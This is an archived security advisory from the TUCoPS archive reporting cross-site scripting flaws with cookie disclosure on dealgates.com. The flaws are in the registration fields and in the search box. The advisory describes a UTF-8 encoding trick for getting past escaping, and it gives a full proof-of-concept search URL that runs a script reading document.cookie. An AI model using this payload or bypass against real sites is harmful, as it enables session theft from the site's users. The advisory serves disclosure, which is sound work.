TUCoPS :: Web :: Specific Sites :: b06-3092.htm

Dealgates.com - XSS with cookie disclosure
Dealgates.com - XSS with cookie disclosure
Dealgates.com - XSS with cookie disclosure



Dealgates.com=0D
=0D
Homepage:=0D
http://www.dealgates.com=0D 
=0D
Affected files:=0D
=0D
*Input boxes when registering new account=0D
=0D
* Search box=0D
-------------------------------------=0D
=0D
XSS vuln with cookie disclosure when registering a new account.=0D
=0D
=0D
To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of '. PoC:=0D
=0D
In the input boxes of "Your name:" and "Address".=0D
=0D
=0D
=0D
For the cookie:=0D
=0D
=0D
=0D
-----------------------------------=0D
=0D
XSS vuln with cookie disclosure via search input box. For a PoC put:=0D
=0D
">">">">">'>'>">"><<"<"<"<"<'<'<"<"=0D
=0D
URL:=0D
https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2=0D 
=0D
=0D
Screenshots:=0D
http://www.youfucktard.com/xsp/dealgates1.jpg=0D 
http://www.youfucktard.com/xsp/dealgates2.jpg=0D 
http://www.youfucktard.com/xsp/dealgates3.jpg=0D 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH